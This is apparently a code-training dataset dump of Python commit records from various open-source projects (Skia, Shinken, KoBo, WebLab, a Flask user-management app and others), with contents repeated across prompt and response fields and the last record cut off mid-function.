Dataset schema:

| column | type |
|---|---|
| commit | string, 40 chars |
| old_file | string, 4–118 chars |
| new_file | string, 4–118 chars |
| old_contents | string, 0–2.94k chars |
| new_contents | string, 1–4.43k chars |
| subject | string, 15–444 chars |
| message | string, 16–3.45k chars |
| lang | string, 1 class |
| license | string, 13 classes |
| repos | string, 5–43.2k chars |
| prompt | string, 17–4.58k chars |
| response | string, 1–4.43k chars |
| prompt_tagged | string, 58–4.62k chars |
| response_tagged | string, 1–4.43k chars |
| text | string, 132–7.29k chars |
| text_tagged | string, 173–7.33k chars |
commit c90d7ae2a407f626342786101eed4159dfbfe730
file: infra/bots/assets/go_deps/create.py

old_contents:
#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create the asset."""
import argparse
import os
import subprocess
def create_asset(target_dir):
"""Create the asset."""
env = {}
env.update(os.environ)
env['GOPATH'] = target_dir
subprocess.check_call(
['go', 'get', '-u', '-t', 'go.skia.org/infra/...'],
env=env)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--target_dir', '-t', required=True)
args = parser.parse_args()
create_asset(args.target_dir)
if __name__ == '__main__':
main()

new_contents:
#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create the asset."""
import argparse
import os
import subprocess
def create_asset(target_dir):
"""Create the asset."""
env = {}
env.update(os.environ)
env['GOPATH'] = target_dir
subprocess.check_call(
['go', 'get', '-u', '-t', 'go.skia.org/infra/...'],
env=env)
# There's a broken symlink which causes a lot of problems. Create the dir it
# points to.
missing_dir = os.path.join(target_dir, 'src', 'go.chromium.org', 'luci',
'web', 'inc', 'bower_components')
os.mkdir(missing_dir)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--target_dir', '-t', required=True)
args = parser.parse_args()
create_asset(args.target_dir)
if __name__ == '__main__':
main()
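
Note that os.mkdir as used above creates only the leaf directory and raises OSError if a parent is missing or the directory already exists. A slightly more defensive variant (a sketch of my own, not what the commit shipped) would be:

import errno
import os

def ensure_dir(path):
    # Create path and any missing parents; tolerate it already existing.
    try:
        os.makedirs(path)
    except OSError as e:
        if e.errno != errno.EEXIST:
            raise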

message:
[infra] Add missing symlink target in go_deps asset
Bug: skia:
Change-Id: Ic806bddcdc1130e9b96158c19dbff9e16900020c
Reviewed-on: https://skia-review.googlesource.com/157565
Reviewed-by: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Commit-Queue: Eric Boren <0e499112533c8544f0505ea0d08394fb5ad7d8fa@google.com>

language: Python
license: bsd-3-clause
repos: HalCanary/skia-hc, aosp-mirror/platform_external_skia, rubenvb/skia, google/skia, Hikari-no-Tenshi/android_external_skia

commit 8431eaf1f7d4e966694c14be2130b91190df140e
file: supermega/tests/test_session.py (new file)

new_contents:
import unittest
import hashlib
from .. import Session
class TestSession(unittest.TestCase):
def setUp(self):
self.sess = Session()
def test_public_file_download(self):
url = 'https://mega.co.nz/#!2ctGgQAI!AkJMowjRiXVcSrRLn3d-e1vl47ZxZEK0CbrHGIKFY-E'
sha256 = '9431103cb989f2913cbc503767015ca22c0ae40942932186c59ffe6d6a69830d'
hash = hashlib.sha256()
def verify_hash(file, chunks):
for chunk in chunks:
hash.update(chunk)
self.assertEqual(hash.hexdigest(), sha256)
self.sess.download(verify_hash, url)
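
To run just this test module, something like the following should work (assuming the supermega package is importable from the current directory):

import unittest
# Discover and run only the session tests with the stdlib runner.
unittest.main(module='supermega.tests.test_session', exit=False)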

message:
Add test for downloading a public file

language: Python
license: bsd-3-clause
repos: lmb/Supermega

commit a38e194961f4f1d675b9e0397b0c8a5fc2500b08
file: python_scripts/mc_solr.py (new file)

new_contents:
import requests
import ipdb
import mc_config
import psycopg2
import psycopg2.extras
import time
def get_solr_location():
##TODO -- get this from the yaml file
return 'http://localhost:8983'
def get_solr_collection_url_prefix():
    # get_solr_location must be called; concatenating the function object
    # itself with a string would raise a TypeError.
    return get_solr_location() + '/solr/collection1'
def solr_request( path, params):
url = get_solr_collection_url_prefix() + '/' + path
params['wt'] = 'json'
r = requests.get( url, params, headers = { 'Accept': 'application/json'})
data = r.json()
return data
def dataimport_command( command, params=None):
    # Use None instead of a mutable {} default so state can't leak between calls.
    if params is None:
        params = {}
    params['command'] = command
    return solr_request( 'dataimport', params )
def dataimport_status():
return dataimport_command( 'status' )
def dataimport_delta_import():
params = {
'commit': 'true',
'clean': 'false',
}
##Note: We're using the delta import through full import approach
return dataimport_command( 'full_import', params )
def dataimport_full_import():
params = {
'commit': 'true',
'clean': 'true',
}
##Note: We're using the delta import through full import approach
return dataimport_command( 'full_import', params )
def dataimport_reload_config():
return dataimport_command( 'reload' )
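
A minimal usage sketch for this wrapper (assuming a Solr data-import handler is reachable at the default location; 'idle' is the status value the DIH status endpoint normally reports when no import is running):

import time

# Start a delta import and poll until the handler goes back to idle.
dataimport_delta_import()
while dataimport_status().get('status') != 'idle':
    time.sleep(5)
print 'delta import finished'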

message:
Create a wrapper library around Solr requests.

language: Python
license: agpl-3.0
repos: AchyuthIIIT/mediacloud, berkmancenter/mediacloud

commit 896c287ad6a5d927febaca4fa957708f783fd51a
file: shinken/modules/logstore_null.py (new file)

new_contents:
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2012:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
# Gregory Starck, g.starck@gmail.com
# Hartmut Goebel, h.goebel@goebel-consult.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
"""
This class stores log broks in a black hole.
It is one possibility (!) for an exchangeable storage for log broks.
"""
import os
import sys
import time
import datetime
import re
from shinken.objects.service import Service
from shinken.basemodule import BaseModule
from shinken.objects.module import Module
properties = {
'daemons': ['livestatus'],
'type': 'logstore_null',
'external': False,
'phases': ['running'],
}
# called by the plugin manager
def get_instance(plugin):
print "Get an LogStore Null module for plugin %s" % plugin.get_name()
instance = LiveStatusLogStoreNull(plugin)
return instance
class LiveStatusLogStoreNull(BaseModule):
def __init__(self, modconf):
BaseModule.__init__(self, modconf)
self.plugins = []
        # Now sleep one second, so that we won't get lineno collisions with the last second
time.sleep(1)
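        # NOTE: Logline is referenced on the next line but never imported in
        # this module (the other LogStore backends pull it in from the
        # livestatus log_line module), so as committed this line raises a
        # NameError when the module is instantiated.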
Logline.lineno = 0
def load(self, app):
self.app = app
def init(self):
pass
def open(self):
print "open LiveStatusLogStoreNull ok"
def close(self):
pass
def commit(self):
pass
def commit_and_rotate_log_db(self):
pass
def manage_log_brok(self, b):
# log brok successfully stored in the black hole
pass
def add_filter(self, operator, attribute, reference):
pass
def add_filter_and(self, andnum):
pass
def add_filter_or(self, ornum):
pass
def add_filter_not(self):
pass
def get_live_data_log(self):
"""Like get_live_data, but for log objects"""
result = []
return result

message:
Add a null LogStore backend for livestatus broker

language: Python
license: agpl-3.0
repos: claneys/shinken, KerkhoffTechnologies/shinken, Simage/shinken, dfranco/shinken, gst/alignak, h4wkmoon/shinken, mohierf/shinken, geektophe/shinken, titilambert/alignak, tal-nino/shinken, staute/shinken_package, lets-software/shinken, rednach/krill, Aimage/shinken, naparuba/shinken, kaji-project/shinken, xorpaul/shinken, savoirfairelinux/shinken, ddurieux/alignak, fpeyre/shinken, rledisez/shinken, peeyush-tm/shinken, staute/shinken_deb, Alignak-monitoring/alignak

commit 3c7c9e9ecd5d91b81b28737aa5557437297f6548
file: src/4-MedianOfTwoSortedArrays.py (new file)

new_contents:
class Solution(object):
def findMedianSortedArrays(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: float
"""
m, n = len(nums1), len(nums2)
if m > n:
nums1, nums2, m, n = nums2, nums1, n, m
if n == 0:
return None
iMin, iMax, half = 0, m, (m + n + 1) / 2
while iMin <= iMax:
i = (iMin + iMax) / 2
j = half - i
if j > 0 and i < m and nums2[j-1] > nums1[i]:
iMin = i + 1
elif i > 0 and j < n and nums1[i-1] > nums2[j]:
iMax = i - 1
else:
if i == 0:
maxOfLeft = nums2[j-1]
elif j == 0:
maxOfLeft = nums1[i-1]
else:
maxOfLeft = max(nums1[i-1], nums2[j-1])
if (m + n) % 2 == 1:
return maxOfLeft
if i == m:
minOfRight = nums2[j]
elif j == n:
minOfRight = nums1[i]
else:
minOfRight = min(nums1[i], nums2[j])
return (maxOfLeft + minOfRight) / 2.0
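
A quick sanity check of the solution (Python 2, matching the integer division the code relies on; the inputs are mine, chosen for illustration):

s = Solution()
print s.findMedianSortedArrays([1, 3], [2])     # -> 2 (odd combined length)
print s.findMedianSortedArrays([1, 2], [3, 4])  # -> 2.5 (even combined length)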

message:
Revert "Revert "Your runtime beats 53.69% of pythonsubmissions.""
This reverts commit 8f36076e50ed375246c1fd23ed9f0e6ed7152e88.

language: Python
license: apache-2.0
repos: zhuxiang/LeetCode-Python

commit 8fd2f0fe7835da72fd230f48ff34cf0c4723babf
file: personalized_content_filter/main.py (new file)

new_contents:
import csv
import indicoio
from indicoio.custom import Collection
# insert your API key
indicoio.config.api_key = "YOUR_API_KEY"
def clean_article(article):
return article.replace("\n", " ").decode('cp1252').encode('utf-8', 'replace')
def test_model(test_list):
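    # Flatten the CSV reader: every cell of every row becomes one article.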
cleaned_test = [clean_article(text) for row in test_list for text in row]
print "Articles cleaned and ready for analysis!"
for data in cleaned_test:
print collection.predict(data)
if __name__ == "__main__":
# Replace "YOUR_COLLECTION_NAME" with the name you gave your dataset in CrowdLabel
collection = Collection("YOUR_COLLECTION_NAME")
with open('test_articles.csv', 'rU') as f:
test_list = csv.reader(f)
test_model(test_list)

message:
Create script for Personalized Content Filter post

language: Python
license: mit
repos: IndicoDataSolutions/SuperCell

commit a501b99fa60ca5118d2a0e0be4e8c2dff5bd385d
file: ci/check-benchmark.py (new file)

new_contents:
#!/usr/bin/env python3
import json
import sys
def run_compare(report):
with open(report) as f:
doc = json.load(f)
for testcase in doc:
measurements = testcase['measurements']
time = float(measurements[0]["time"])
if time < 0:
continue
if time > 0.05:
print("More than 5% performance decrease, considering it a failure")
sys.exit(2)
def main(argv):
if len(argv) != 2:
print(f'Usage: {argv[0]} <path-to-compare.json>')
sys.exit(1)
run_compare(argv[1])
if __name__ == '__main__':
main(sys.argv)
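
For reference, the report shape run_compare() expects, inferred from the code itself rather than from any benchmark tool's documentation:

report = [
    {"measurements": [{"time": 0.031}]},   # +3.1% slower -> tolerated
    {"measurements": [{"time": -0.120}]},  # faster -> skipped by the < 0 check
    {"measurements": [{"time": 0.070}]},   # +7.0% slower -> sys.exit(2)
]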

message:
CI: Add a script to process benchmark comparisons

language: Python
license: lgpl-2.1
repos: chouquette/medialibrary

commit 9edb1098aa7a4993d801550d03399fd85450b0c0
file: regscrape/regs_common/commands/mark_searchable_entities.py (new file)

new_contents:
GEVENT = False
def run():
from regs_models import Entity
print "Updating entity search index..."
# mark the ones that should be searchable but aren't as searchable
Entity.objects(__raw__={
'td_type': 'organization',
'stats.count': {'$gt': 0},
'searchable': False
}).update(set__searchable=True, safe_update=True, multi=True)
    # mark the ones that are searchable but shouldn't be as unsearchable
Entity.objects(__raw__={
'$or': [
{'td_type': {'$ne': 'organization'}},
{'stats.count': {'$not': {'$gt': 0}}}
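            # ($not + $gt rather than $lte so entities missing stats.count
            # entirely are matched too)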
],
'searchable': True
}).update(set__searchable=False, safe_update=True, multi=True)
print "Update complete."

message:
Add a tiny bit of infrastructure to make Mongo-based search work for entities.

language: Python
license: bsd-3-clause
repos: sunlightlabs/regulations-scraper

commit bdb30f79722b5111a240f2724cdd12ac353493a7
file: kpi/tests/api/v1/test_api_exports.py (new file)

new_contents:
# coding: utf-8
from collections import defaultdict
from rest_framework import status
from rest_framework.reverse import reverse
from kpi.models import Asset, ExportTask
from kpi.tests.base_test_case import BaseTestCase
from kpi.tests.test_mock_data_exports import MockDataExports
class AssetExportTaskTest(MockDataExports, BaseTestCase):
def test_export_uid_filter(self):
assert self.user.username == 'someuser'
def _create_export_task(asset):
export_task = ExportTask()
export_task.user = self.user
export_task.data = {
'source': reverse('asset-detail', args=[asset.uid]),
'type': 'csv'
}
messages = defaultdict(list)
export_task._run_task(messages)
return export_task
matching_export = _create_export_task(self.asset)
# Create a clone and generate an export from it
excluded_asset = Asset()
excluded_asset.owner = self.asset.owner
excluded_asset.content = self.asset.content
excluded_asset.save()
excluded_asset.deploy(backend='mock', active=True)
excluded_asset.save()
excluded_export = _create_export_task(excluded_asset)
# Retrieve all the exports unfiltered
self.client.login(username='someuser', password='someuser')
list_url = reverse(self._get_endpoint('exporttask-list'))
response = self.client.get(list_url)
assert response.status_code == status.HTTP_200_OK
assert response.json()['count'] == 2
# Retrieve the exports filtered by a single asset uid
filter_url = f'{list_url}?q=source:{self.asset.uid}'
response = self.client.get(filter_url)
assert response.status_code == status.HTTP_200_OK
response_dict = response.json()
assert response_dict['count'] == 1
assert self.asset.uid in response_dict['results'][0]['data']['source']

message:
Add (failing) test for uid export filter

language: Python
license: agpl-3.0
repos: kobotoolbox/kpi

|
Add (failing) test for uid export filter
|
# coding: utf-8
from collections import defaultdict
from rest_framework import status
from rest_framework.reverse import reverse
from kpi.models import Asset, ExportTask
from kpi.tests.base_test_case import BaseTestCase
from kpi.tests.test_mock_data_exports import MockDataExports
class AssetExportTaskTest(MockDataExports, BaseTestCase):
def test_export_uid_filter(self):
assert self.user.username == 'someuser'
def _create_export_task(asset):
export_task = ExportTask()
export_task.user = self.user
export_task.data = {
'source': reverse('asset-detail', args=[asset.uid]),
'type': 'csv'
}
messages = defaultdict(list)
export_task._run_task(messages)
return export_task
matching_export = _create_export_task(self.asset)
# Create a clone and generate an export from it
excluded_asset = Asset()
excluded_asset.owner = self.asset.owner
excluded_asset.content = self.asset.content
excluded_asset.save()
excluded_asset.deploy(backend='mock', active=True)
excluded_asset.save()
excluded_export = _create_export_task(excluded_asset)
# Retrieve all the exports unfiltered
self.client.login(username='someuser', password='someuser')
list_url = reverse(self._get_endpoint('exporttask-list'))
response = self.client.get(list_url)
assert response.status_code == status.HTTP_200_OK
assert response.json()['count'] == 2
# Retrieve the exports filtered by a single asset uid
filter_url = f'{list_url}?q=source:{self.asset.uid}'
response = self.client.get(filter_url)
assert response.status_code == status.HTTP_200_OK
response_dict = response.json()
assert response_dict['count'] == 1
assert self.asset.uid in response_dict['results'][0]['data']['source']
|
<commit_before><commit_msg>Add (failing) test for uid export filter<commit_after>
|
# coding: utf-8
from collections import defaultdict
from rest_framework import status
from rest_framework.reverse import reverse
from kpi.models import Asset, ExportTask
from kpi.tests.base_test_case import BaseTestCase
from kpi.tests.test_mock_data_exports import MockDataExports
class AssetExportTaskTest(MockDataExports, BaseTestCase):
def test_export_uid_filter(self):
assert self.user.username == 'someuser'
def _create_export_task(asset):
export_task = ExportTask()
export_task.user = self.user
export_task.data = {
'source': reverse('asset-detail', args=[asset.uid]),
'type': 'csv'
}
messages = defaultdict(list)
export_task._run_task(messages)
return export_task
matching_export = _create_export_task(self.asset)
# Create a clone and generate an export from it
excluded_asset = Asset()
excluded_asset.owner = self.asset.owner
excluded_asset.content = self.asset.content
excluded_asset.save()
excluded_asset.deploy(backend='mock', active=True)
excluded_asset.save()
excluded_export = _create_export_task(excluded_asset)
# Retrieve all the exports unfiltered
self.client.login(username='someuser', password='someuser')
list_url = reverse(self._get_endpoint('exporttask-list'))
response = self.client.get(list_url)
assert response.status_code == status.HTTP_200_OK
assert response.json()['count'] == 2
# Retrieve the exports filtered by a single asset uid
filter_url = f'{list_url}?q=source:{self.asset.uid}'
response = self.client.get(filter_url)
assert response.status_code == status.HTTP_200_OK
response_dict = response.json()
assert response_dict['count'] == 1
assert self.asset.uid in response_dict['results'][0]['data']['source']
|
Add (failing) test for uid export filter# coding: utf-8
from collections import defaultdict
from rest_framework import status
from rest_framework.reverse import reverse
from kpi.models import Asset, ExportTask
from kpi.tests.base_test_case import BaseTestCase
from kpi.tests.test_mock_data_exports import MockDataExports
class AssetExportTaskTest(MockDataExports, BaseTestCase):
def test_export_uid_filter(self):
assert self.user.username == 'someuser'
def _create_export_task(asset):
export_task = ExportTask()
export_task.user = self.user
export_task.data = {
'source': reverse('asset-detail', args=[asset.uid]),
'type': 'csv'
}
messages = defaultdict(list)
export_task._run_task(messages)
return export_task
matching_export = _create_export_task(self.asset)
# Create a clone and generate an export from it
excluded_asset = Asset()
excluded_asset.owner = self.asset.owner
excluded_asset.content = self.asset.content
excluded_asset.save()
excluded_asset.deploy(backend='mock', active=True)
excluded_asset.save()
excluded_export = _create_export_task(excluded_asset)
# Retrieve all the exports unfiltered
self.client.login(username='someuser', password='someuser')
list_url = reverse(self._get_endpoint('exporttask-list'))
response = self.client.get(list_url)
assert response.status_code == status.HTTP_200_OK
assert response.json()['count'] == 2
# Retrieve the exports filtered by a single asset uid
filter_url = f'{list_url}?q=source:{self.asset.uid}'
response = self.client.get(filter_url)
assert response.status_code == status.HTTP_200_OK
response_dict = response.json()
assert response_dict['count'] == 1
assert self.asset.uid in response_dict['results'][0]['data']['source']
|
<commit_before><commit_msg>Add (failing) test for uid export filter<commit_after># coding: utf-8
from collections import defaultdict
from rest_framework import status
from rest_framework.reverse import reverse
from kpi.models import Asset, ExportTask
from kpi.tests.base_test_case import BaseTestCase
from kpi.tests.test_mock_data_exports import MockDataExports
class AssetExportTaskTest(MockDataExports, BaseTestCase):
def test_export_uid_filter(self):
assert self.user.username == 'someuser'
def _create_export_task(asset):
export_task = ExportTask()
export_task.user = self.user
export_task.data = {
'source': reverse('asset-detail', args=[asset.uid]),
'type': 'csv'
}
messages = defaultdict(list)
export_task._run_task(messages)
return export_task
matching_export = _create_export_task(self.asset)
# Create a clone and generate an export from it
excluded_asset = Asset()
excluded_asset.owner = self.asset.owner
excluded_asset.content = self.asset.content
excluded_asset.save()
excluded_asset.deploy(backend='mock', active=True)
excluded_asset.save()
excluded_export = _create_export_task(excluded_asset)
# Retrieve all the exports unfiltered
self.client.login(username='someuser', password='someuser')
list_url = reverse(self._get_endpoint('exporttask-list'))
response = self.client.get(list_url)
assert response.status_code == status.HTTP_200_OK
assert response.json()['count'] == 2
# Retrieve the exports filtered by a single asset uid
filter_url = f'{list_url}?q=source:{self.asset.uid}'
response = self.client.get(filter_url)
assert response.status_code == status.HTTP_200_OK
response_dict = response.json()
assert response_dict['count'] == 1
assert self.asset.uid in response_dict['results'][0]['data']['source']
|
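Note: the test above targets a `?q=source:<uid>` filter that does not exist yet (hence "failing" in the commit message). A minimal sketch of the queryset filtering it implies is below (hypothetical helper, not the project's actual filter backend; it assumes `data` is a JSON field whose keys support `icontains` lookups):
def filter_exports_by_source(queryset, q):
    # Expects q of the form "source:<asset_uid>" and matches the uid
    # against the source URL stored in each export's data payload.
    if q and q.startswith('source:'):
        uid = q.split(':', 1)[1]
        return queryset.filter(data__source__icontains=uid)
    return queryset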
|
c67c2fa38512cad8aa8c20c7c57f2639d6882a8a
|
server/src/test/util/experiments.py
|
server/src/test/util/experiments.py
|
import json
import weblab.core.coordinator.coordinator as Coordinator
import weblab.experiment.level as level
from weblab.experiment.experiment import Experiment
class StorageExperiment(Experiment):
def __init__(self, coord_address, locator, config, *args, **kwargs):
super(StorageExperiment, self).__init__(*args, **kwargs)
self.commands = []
def do_start_experiment(self, client_initial_data, server_initial_data):
return "{}"
def do_get_api(self):
return level.level_2
def do_send_command_to_device(self, command):
self.commands.append(command)
print command
return command
def clear(self):
self.commands = []
def do_dispose(self):
return json.dumps({ Coordinator.FINISH_FINISHED_MESSAGE : True, Coordinator.FINISH_DATA_MESSAGE : ""})
|
Add dummy experiment for testing
|
Add dummy experiment for testing
|
Python
|
bsd-2-clause
|
zstars/weblabdeusto,zstars/weblabdeusto,porduna/weblabdeusto,porduna/weblabdeusto,porduna/weblabdeusto,zstars/weblabdeusto,zstars/weblabdeusto,morelab/weblabdeusto,weblabdeusto/weblabdeusto,morelab/weblabdeusto,morelab/weblabdeusto,zstars/weblabdeusto,zstars/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,zstars/weblabdeusto,porduna/weblabdeusto,porduna/weblabdeusto,porduna/weblabdeusto,morelab/weblabdeusto,zstars/weblabdeusto,porduna/weblabdeusto,morelab/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,morelab/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,zstars/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,weblabdeusto/weblabdeusto,zstars/weblabdeusto,morelab/weblabdeusto
|
Add dummy experiment for testing
|
import json
import weblab.core.coordinator.coordinator as Coordinator
import weblab.experiment.level as level
from weblab.experiment.experiment import Experiment
class StorageExperiment(Experiment):
def __init__(self, coord_address, locator, config, *args, **kwargs):
super(StorageExperiment, self).__init__(*args, **kwargs)
self.commands = []
def do_start_experiment(self, client_initial_data, server_initial_data):
return "{}"
def do_get_api(self):
return level.level_2
def do_send_command_to_device(self, command):
self.commands.append(command)
print command
return command
def clear(self):
self.commands = []
def do_dispose(self):
return json.dumps({ Coordinator.FINISH_FINISHED_MESSAGE : True, Coordinator.FINISH_DATA_MESSAGE : ""})
|
<commit_before><commit_msg>Add dummy experiment for testing<commit_after>
|
import json
import weblab.core.coordinator.coordinator as Coordinator
import weblab.experiment.level as level
from weblab.experiment.experiment import Experiment
class StorageExperiment(Experiment):
def __init__(self, coord_address, locator, config, *args, **kwargs):
super(StorageExperiment, self).__init__(*args, **kwargs)
self.commands = []
def do_start_experiment(self, client_initial_data, server_initial_data):
return "{}"
def do_get_api(self):
return level.level_2
def do_send_command_to_device(self, command):
self.commands.append(command)
print command
return command
def clear(self):
self.commands = []
def do_dispose(self):
return json.dumps({ Coordinator.FINISH_FINISHED_MESSAGE : True, Coordinator.FINISH_DATA_MESSAGE : ""})
|
Add dummy experiment for testingimport json
import weblab.core.coordinator.coordinator as Coordinator
import weblab.experiment.level as level
from weblab.experiment.experiment import Experiment
class StorageExperiment(Experiment):
def __init__(self, coord_address, locator, config, *args, **kwargs):
super(StorageExperiment, self).__init__(*args, **kwargs)
self.commands = []
def do_start_experiment(self, client_initial_data, server_initial_data):
return "{}"
def do_get_api(self):
return level.level_2
def do_send_command_to_device(self, command):
self.commands.append(command)
print command
return command
def clear(self):
self.commands = []
def do_dispose(self):
return json.dumps({ Coordinator.FINISH_FINISHED_MESSAGE : True, Coordinator.FINISH_DATA_MESSAGE : ""})
|
<commit_before><commit_msg>Add dummy experiment for testing<commit_after>import json
import weblab.core.coordinator.coordinator as Coordinator
import weblab.experiment.level as level
from weblab.experiment.experiment import Experiment
class StorageExperiment(Experiment):
def __init__(self, coord_address, locator, config, *args, **kwargs):
super(StorageExperiment, self).__init__(*args, **kwargs)
self.commands = []
def do_start_experiment(self, client_initial_data, server_initial_data):
return "{}"
def do_get_api(self):
return level.level_2
def do_send_command_to_device(self, command):
self.commands.append(command)
print command
return command
def clear(self):
self.commands = []
def do_dispose(self):
return json.dumps({ Coordinator.FINISH_FINISHED_MESSAGE : True, Coordinator.FINISH_DATA_MESSAGE : ""})
|
|
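A sketch of how a test might drive this dummy experiment (hypothetical usage; it assumes the Experiment base class requires no constructor arguments beyond those shown):
exp = StorageExperiment(coord_address=None, locator=None, config=None)
exp.do_start_experiment('{}', '{}')         # returns "{}"
exp.do_send_command_to_device('ping')       # echoes back and records the command
assert exp.commands == ['ping']
exp.clear()                                 # resets the recorded command log
assert exp.commands == []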
5371af1ff5aae6f9db51698f1a09dbf50dec4027
|
maediprojects/views/users.py
|
maediprojects/views/users.py
|
from flask import Flask, render_template, flash, request, Markup, \
session, redirect, url_for, escape, Response, abort, send_file, \
current_app
from flask.ext.login import (LoginManager, current_user, login_required,
login_user, logout_user, UserMixin,
confirm_login,
fresh_login_required)
from maediprojects import app, db, models
from maediprojects.query import user as quser
from maediprojects.lib import codelists
login_manager = LoginManager()
login_manager.setup_app(app)
login_manager.login_view = "login"
@login_manager.user_loader
def load_user(id):
return quser.user(id)
@app.route("/users/")
@login_required
def users():
users = quser.user()
return render_template("users.html",
users = users,
loggedinuser=current_user)
@app.route("/users/new/", methods=["GET", "POST"])
@login_required
def users_new():
if request.method=="GET":
user = {}
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.addUser(request.form):
flash("Successfully created user!", "success")
else:
flash("Sorry, couldn't create that user!", "danger")
return redirect(url_for("users"))
@app.route("/users/<user_id>/", methods=["GET", "POST"])
@login_required
def users_edit(user_id):
if request.method=="GET":
user = quser.user(user_id)
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.updateUser(request.form):
flash("Successfully updated user!", "success")
else:
flash("Sorry, couldn't update that user!", "danger")
return redirect(url_for("users"))
@app.route("/login/", methods=["GET", "POST"])
def login():
if request.method == "POST" and "username" in request.form:
user = quser.user_by_username(request.form["username"])
if (user and user.check_password(request.form["password"])):
if login_user(user):
flash("Logged in!", "success")
if request.args.get("next"):
redir_url = request.script_root + request.args.get("next")
else:
redir_url = url_for("dashboard")
return redirect(redir_url)
else:
flash("Sorry, but you could not log in.", "danger")
else:
flash(u"Invalid username or password.", "danger")
return render_template("login.html",
loggedinuser=current_user)
@app.route('/logout/')
@login_required
def logout():
logout_user()
flash('Logged out', 'success')
redir_url = url_for("dashboard")
return redirect(redir_url)
|
Add views on to user management functions
|
Add views on to user management functions
|
Python
|
agpl-3.0
|
markbrough/maedi-projects,markbrough/maedi-projects,markbrough/maedi-projects
|
Add views on to user management functions
|
from flask import Flask, render_template, flash, request, Markup, \
session, redirect, url_for, escape, Response, abort, send_file, \
current_app
from flask.ext.login import (LoginManager, current_user, login_required,
login_user, logout_user, UserMixin,
confirm_login,
fresh_login_required)
from maediprojects import app, db, models
from maediprojects.query import user as quser
from maediprojects.lib import codelists
login_manager = LoginManager()
login_manager.setup_app(app)
login_manager.login_view = "login"
@login_manager.user_loader
def load_user(id):
return quser.user(id)
@app.route("/users/")
@login_required
def users():
users = quser.user()
return render_template("users.html",
users = users,
loggedinuser=current_user)
@app.route("/users/new/", methods=["GET", "POST"])
@login_required
def users_new():
if request.method=="GET":
user = {}
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.addUser(request.form):
flash("Successfully created user!", "success")
else:
flash("Sorry, couldn't create that user!", "danger")
return redirect(url_for("users"))
@app.route("/users/<user_id>/", methods=["GET", "POST"])
@login_required
def users_edit(user_id):
if request.method=="GET":
user = quser.user(user_id)
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.updateUser(request.form):
flash("Successfully updated user!", "success")
else:
flash("Sorry, couldn't update that user!", "danger")
return redirect(url_for("users"))
@app.route("/login/", methods=["GET", "POST"])
def login():
if request.method == "POST" and "username" in request.form:
user = quser.user_by_username(request.form["username"])
if (user and user.check_password(request.form["password"])):
if login_user(user):
flash("Logged in!", "success")
if request.args.get("next"):
redir_url = request.script_root + request.args.get("next")
else:
redir_url = url_for("dashboard")
return redirect(redir_url)
else:
flash("Sorry, but you could not log in.", "danger")
else:
flash(u"Invalid username or password.", "danger")
return render_template("login.html",
loggedinuser=current_user)
@app.route('/logout/')
@login_required
def logout():
logout_user()
flash('Logged out', 'success')
redir_url = url_for("dashboard")
return redirect(redir_url)
|
<commit_before><commit_msg>Add views on to user management functions<commit_after>
|
from flask import Flask, render_template, flash, request, Markup, \
session, redirect, url_for, escape, Response, abort, send_file, \
current_app
from flask.ext.login import (LoginManager, current_user, login_required,
login_user, logout_user, UserMixin,
confirm_login,
fresh_login_required)
from maediprojects import app, db, models
from maediprojects.query import user as quser
from maediprojects.lib import codelists
login_manager = LoginManager()
login_manager.setup_app(app)
login_manager.login_view = "login"
@login_manager.user_loader
def load_user(id):
return quser.user(id)
@app.route("/users/")
@login_required
def users():
users = quser.user()
return render_template("users.html",
users = users,
loggedinuser=current_user)
@app.route("/users/new/", methods=["GET", "POST"])
@login_required
def users_new():
if request.method=="GET":
user = {}
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.addUser(request.form):
flash("Successfully created user!", "success")
else:
flash("Sorry, couldn't create that user!", "danger")
return redirect(url_for("users"))
@app.route("/users/<user_id>/", methods=["GET", "POST"])
@login_required
def users_edit(user_id):
if request.method=="GET":
user = quser.user(user_id)
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.updateUser(request.form):
flash("Successfully updated user!", "success")
else:
flash("Sorry, couldn't update that user!", "danger")
return redirect(url_for("users"))
@app.route("/login/", methods=["GET", "POST"])
def login():
if request.method == "POST" and "username" in request.form:
user = quser.user_by_username(request.form["username"])
if (user and user.check_password(request.form["password"])):
if login_user(user):
flash("Logged in!", "success")
if request.args.get("next"):
redir_url = request.script_root + request.args.get("next")
else:
redir_url = url_for("dashboard")
return redirect(redir_url)
else:
flash("Sorry, but you could not log in.", "danger")
else:
